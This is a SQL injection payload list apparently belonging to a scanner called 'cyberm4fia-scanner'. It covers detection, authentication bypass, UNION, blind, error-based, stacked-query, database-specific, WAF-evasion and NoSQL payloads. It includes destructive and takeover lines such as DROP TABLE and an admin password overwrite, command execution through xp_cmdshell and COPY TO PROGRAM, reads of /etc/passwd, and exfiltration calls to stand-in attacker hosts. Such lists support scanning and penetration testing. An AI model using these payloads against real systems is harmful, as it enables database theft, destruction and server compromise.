# SQLi Payloads — cyberm4fia-scanner
# Categories: Detection, Union, Auth Bypass, Blind, WAF Bypass, DB-Specific, Stacked, Second-Order

# ─── Detection / Error Triggering ───
'
"
`
')
")
`)
'))
"))
\
' AND '1'='1
' AND '1'='2
" AND "1"="1
" AND "1"="2
' AND 1=1--
' AND 1=2--
" AND 1=1--
" AND 1=2--
1' AND '1'='1
1' AND '1'='2
1" AND "1"="1
1 AND 1=1
1 AND 1=2
1' AND 1=1#
1' AND 1=2#
OR 1=1
OR 1=2
' OR 1=1--
" OR 1=1--
'||1=1--
' XOR 1=1--
' DIV 1=1--
' IS NULL--
' IS NOT NULL--
' LIKE '%'--

# ─── Auth Bypass ───
' OR '1'='1
" OR "1"="1
' OR '1'='1'--
" OR "1"="1"--
' OR 1=1--
" OR 1=1--
' OR 1=1#
" OR 1=1#
admin'--
admin' #
admin'/*
' OR ''='
" OR ""="
') OR ('1'='1
") OR ("1"="1
') OR ('1'='1'--
' OR 1=1 LIMIT 1--
admin' OR '1'='1
1' OR '1'='1'-- -
1" OR "1"="1"-- -
'='
'LIKE'
1' OR 1=1 OR '1'='1
' OR EXISTS(SELECT 1)--
' OR 1=1;--
admin' OR 1=1--
admin')--
admin") OR ("1"="1
' OR 1#
' OR 1=1-- -
'||'1'='1
'||(SELECT 1)='1
' UNION SELECT 1 WHERE 1=1--
admin'-- -
' OR 'x'='x
' OR 1 LIKE 1--
' OR 'a'='a'--
or true--
' or true--
') or true--
admin' or '1'='1'#
') or ('x')=('x
' OR 1=1 LIMIT 1 OFFSET 0--

# ─── Union-based Injection ───
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL--
" UNION SELECT NULL,NULL--
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT 1,2,3,4,5,6--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
') UNION SELECT NULL--
') UNION SELECT NULL,NULL--
') UNION SELECT NULL,NULL,NULL--
1' UNION SELECT username,password FROM users--
1' UNION SELECT table_name,NULL FROM information_schema.tables--
1' UNION SELECT column_name,NULL FROM information_schema.columns--
1' UNION SELECT @@version,NULL--
1' UNION SELECT user(),database()--
1' UNION SELECT GROUP_CONCAT(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--
1' UNION SELECT GROUP_CONCAT(column_name),NULL FROM information_schema.columns WHERE table_name='users'--
1' UNION SELECT GROUP_CONCAT(username,0x3a,password),NULL FROM users--
0 UNION SELECT NULL--
0 UNION SELECT NULL,NULL--
-1 UNION SELECT 1,2,3--
-1' UNION SELECT 1,2,3--

# ─── Blind Boolean-based ───
' AND 1=1--
' AND 1=2--
' AND (SELECT 1)=1--
' AND (SELECT 1 FROM dual)=1--
' AND SUBSTRING(@@version,1,1)='5'--
' AND (SELECT COUNT(*) FROM users)>0--
' AND ASCII(SUBSTRING(database(),1,1))>64--
' AND ASCII(SUBSTRING(database(),1,1))>96--
' AND (SELECT LENGTH(database()))>0--
1' AND 1=1#
1' AND 1=2#
' AND (SELECT SUBSTR(username,1,1) FROM users LIMIT 1)='a'--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' AND BINARY SUBSTRING(database(),1,1)='a'--
' AND ORD(MID(database(),1,1))>100--
' AND LEFT(database(),1)>'a'--
' AND RIGHT(database(),1)>'a'--
' AND IF(1=1,1,0)--
' AND IF(1=2,1,0)--
1 AND (SELECT COUNT(*) FROM users WHERE username='admin')=1

# ─── Blind Time-based ───
' AND SLEEP(5)--
1' AND SLEEP(5)--
" AND SLEEP(5)--
' OR SLEEP(5)--
1' AND SLEEP(5)#
' AND (SELECT SLEEP(5))--
') AND SLEEP(5)--
'; WAITFOR DELAY '0:0:5'--
1'; WAITFOR DELAY '0:0:5'--
" AND WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'#
' AND pg_sleep(5)--
1' AND pg_sleep(5)--
" AND pg_sleep(5)--
') AND pg_sleep(5)--
' || pg_sleep(5)--
1; SELECT pg_sleep(5)--
' AND BENCHMARK(5000000,SHA1('test'))--
1' AND BENCHMARK(5000000,SHA1('test'))#
' AND (SELECT 1 FROM (SELECT SLEEP(5))x)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=2,SLEEP(5),0)--
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END)--
1' AND SLEEP(5)-- -
' OR IF(1=1,SLEEP(5),0)--
" OR IF(1=1,SLEEP(5),0)--
') OR SLEEP(5)--
1 AND SLEEP(5)
1' RLIKE SLEEP(5)#
'+(SELECT SLEEP(5))+'

# ─── Stacked Queries ───
'; DROP TABLE users--
'; SELECT 1--
'; INSERT INTO users VALUES('hacker','pass')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; CREATE TABLE test(id int)--
1; DROP TABLE users--
1; SELECT SLEEP(5)--
'; SELECT * FROM users--
'; SELECT @@version--
1; SELECT pg_sleep(5)
'; EXEC xp_cmdshell('whoami')--

# ─── Error-based Injection ───
1' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
1' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
' AND EXP(~(SELECT * FROM (SELECT version())x))--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND GTID_SUBSET(version(),0)--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(version())) USING utf8)))--
' AND 1=CONVERT(version() USING utf8)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--
' AND POLYGON((SELECT * FROM (SELECT * FROM (SELECT version())a)b))--
' AND (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))--

# ─── MySQL Specific ───
' ORDER BY 1--
' ORDER BY 10--
' ORDER BY 100--
' GROUP BY 1--
' HAVING 1=1--
1' ORDER BY 1#
1' ORDER BY 10#
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT schema_name FROM information_schema.schemata--
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT LOAD_FILE(0x2f6574632f706173737764)--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
1' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
' AND EXP(~(SELECT * FROM (SELECT version())x))--
' INTO OUTFILE '/tmp/test.txt'--
' UNION SELECT @@datadir--
' UNION SELECT @@basedir--
' UNION SELECT @@hostname--
' UNION SELECT @@global.secure_file_priv--

# ─── PostgreSQL Specific ───
' AND 1=CAST((SELECT version()) AS int)--
'; SELECT version()--
' UNION SELECT NULL,version()--
' AND (SELECT current_database())='public'--
'; COPY (SELECT '') TO PROGRAM 'id'--
' AND 1=1::int--
' AND CAST(version() AS int)=1--
' UNION SELECT NULL,current_user--
' UNION SELECT NULL,current_database()--
'; SELECT string_agg(tablename,',' ) FROM pg_tables--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END)--
' UNION SELECT NULL,pg_read_file('/etc/passwd',0,200)--

# ─── MSSQL Specific ───
' AND 1=CONVERT(int,@@version)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC master..xp_cmdshell 'dir'--
' UNION SELECT @@version--
' AND @@version>0--
'; DECLARE @x VARCHAR(100);SET @x='test';--
' AND 1=(SELECT TOP 1 name FROM sysobjects)--
'; EXEC sp_configure 'show advanced options',1;RECONFIGURE--
' UNION SELECT DB_NAME()--
' UNION SELECT name FROM master..sysdatabases--
' UNION SELECT TOP 1 name FROM sysobjects WHERE xtype='U'--
'; EXEC xp_dirtree '\\attacker\share'--

# ─── SQLite Specific ───
' AND sqlite_version()>0--
' UNION SELECT sqlite_version()--
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name FROM sqlite_master WHERE type='table'--
' UNION SELECT tbl_name FROM sqlite_master--
' UNION SELECT GROUP_CONCAT(sql,char(10)) FROM sqlite_master--
' AND RANDOMBLOB(500000000)--
' UNION SELECT LOAD_EXTENSION('a')--

# ─── Oracle Specific ───
' AND 1=UTL_INADDR.GET_HOST_ADDRESS('test')--
' UNION SELECT NULL FROM dual--
' UNION SELECT banner FROM v$version--
' UNION SELECT username FROM all_users--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x',5)=1--
' UNION SELECT user FROM dual--
' UNION SELECT table_name FROM all_tables--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))--
' AND 1=UTL_HTTP.REQUEST('http://evil.com/'||(SELECT user FROM dual))--

# ─── WAF Bypass Techniques ───
'/**/OR/**/1=1--
'/**/UNION/**/SELECT/**/NULL--
'/*!UNION*//*!SELECT*/NULL--
' /*!50000UNION*/ /*!50000SELECT*/ NULL--
' %55NION %53ELECT NULL--
' UN/**/ION SE/**/LECT NULL--
' uNiOn SeLeCt NULL--
' UnIoN sElEcT NULL--
'%09OR%091=1--
'%0aOR%0a1=1--
'%0dOR%0d1=1--
'%0bOR%0b1=1--
' OR+1=1--
' OR/**/ 1=1--
1'&&'1'='1
1'||'1'='1
' AND 1 LIKE 1--
' AND 1 RLIKE 1--
' AND 1 REGEXP 1--
'+OR+1=1--+'
'-1' OR '1' LIKE '1
' OR 1=1 -- -
' OR 1=1 --	-
'||(SELECT 1)||'
'+(SELECT 1)+'
' /*!50000AND*/ 1=1--
' AND/*!50000 1=1*/--
'%a0OR%a01=1--
' OR%0b1=1--
' OR%0c1=1--
' || 1=1 %00--

# ─── Double Encoding ───
%2527%2520OR%25201%253D1--
%252F%252A%252A%252FUNION%252F%252A%252A%252FSELECT
%2527+OR+%25271%2527%253D%25271

# ─── JSON/NoSQL Injection ───
{"$gt":""}
{"$ne":""}
{"$regex":".*"}
{"$gt":"","$lt":"z"}
' || 1==1//
' || '1'=='1
{"username":{"$ne":""},"password":{"$ne":""}}
{"username":"admin","password":{"$gt":""}}
admin' || '1'=='1

# ─── Inline Comments ───
'--
'#
'-- -
'--+
'%23
'--+--
/**/
'/*
'-
1'--
1'#
1'-- -

# ─── Advanced UNION Based ───
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT current_user()--

# ─── Advanced Error Based (WAF Bypass) ───
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT version()), 0x23, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--
' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT version())))--
' AND UPDATEXML(1, CONCAT(0x5c, (SELECT version())), 1)--
' OR 1=CAST((SELECT @@version) AS INT)--
' OR 1=CONVERT(INT, (SELECT @@version))--

# ─── Time-Based & Boolean Blind (WAF Obfuscation) ───
' OR SLEEP(5)='
' AND SLEEP(5)='
' OR SLEEP(5)#
' AND SLEEP(5)--
'; WAITFOR DELAY '0:0:5'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)--
' XxORr SLEEP(5)=''
' AnNdD SLEEP(5)=''
'/*!50000SLEEP(5)*/--
' AND IF(1=1,SLEEP(5),0)--
' OR IF(1=1,SLEEP(5),0)--
' AND BENCHMARK(5000000,MD5(1))--
' OR BENCHMARK(5000000,MD5(1))--
' AND pg_sleep(5)--
' OR pg_sleep(5)--

# ─── PostgreSQL / Oracle Specific ───
'; SELECT pg_sleep(5);--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)=1--
' OR DBMS_PIPE.RECEIVE_MESSAGE('a',5)=1--
# Time-based blind
' AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
" AND SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
# Stacked queries
'; DROP TABLE users--
'; INSERT INTO users VALUES ('hacker','pass')--
'; SELECT @@version--
# WAF bypass
'/**/OR/**/1=1--
'/*!50000OR*/1=1--
SEL/**/ECT 1
uni/**/on sel/**/ect 1,2,3
%55NION%53ELECT 1
# NoSQL injection (MongoDB)
{"$ne": null}
{"$gt": ""}
{"$regex": "^a"}
{"$where": "sleep(5000)"}
# Second order
' UNION SELECT 'admin','$2b$12$...',1,2-- (hash injection)
